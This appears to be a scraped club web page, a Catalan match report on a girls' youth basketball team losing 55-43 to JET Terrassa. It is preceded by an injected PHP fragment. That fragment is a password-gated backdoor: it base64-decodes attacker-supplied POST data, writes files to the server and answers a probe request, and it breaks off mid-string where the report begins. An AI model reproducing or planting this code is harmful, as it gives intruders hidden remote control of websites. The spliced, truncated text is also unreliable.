function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota a Terrassa (55-43) -

Derrota a Terrassa (55-43)

Updated: octubre 3, 2022

En la tercera jornada de lliga l’Infantil femení de primer any 10A del TGN  ha jugat un partit molt intens contra la JET de Terrassa. La primera part ha estat igualada fins que les locals han realitzat un parcial de 13-0 en els últims 3 minuts de la segona meitat. En la segona part, el TGN ha millorat en defensa deixant la JET en 8 punts en el tercer període i 11 en l’últim. Tot i així, a pesar de posar-se a 6 punts (49-43 en el minut 38) el TGN no ha pogut emportar-se el partit. Toca seguir treballant EQUIP!